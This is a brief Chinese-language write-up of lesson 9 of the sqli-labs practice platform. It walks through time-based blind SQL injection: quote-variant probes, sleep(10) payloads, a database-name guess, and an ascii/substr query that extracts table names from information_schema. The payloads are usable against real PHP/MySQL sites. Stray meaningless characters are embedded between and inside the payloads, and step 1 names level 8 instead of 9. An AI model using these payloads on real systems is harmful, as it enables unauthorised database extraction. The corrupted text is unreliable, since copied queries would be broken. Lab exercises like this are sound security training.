sqli-labs第九关分析

1、首先我们使用phpstudy和sqli-labs搭建注入平台，可见工具搭建方法，打开第八关系统正常运行如下。

2、使用单引号、双引号、加括号测试都为同样的界面，没有提示出错。

3、添加sleep观察，Id=1' and sleep(10) --+Id=1') and sleep(10) --+朐袁噙岿Id=1" and sleep(10) --+Id=1") and sleep(10) --+ 其中Id=1' and sleep(10) --+执行后10秒之后刷新，推测sql语句为select * from table where id ='input'。

4、使用猜解语句进行测试id' and (select if((select database())='security',sleep(10),NULL)) --+。

5、可以使用复杂的语句通过ascii来测试id=1' and (select if(ascii(substr((select table_name from 足毂忍珩information_schema.tables where table_schema=database() limit 0,1),1,1))=111,sleep(10),NULL))--+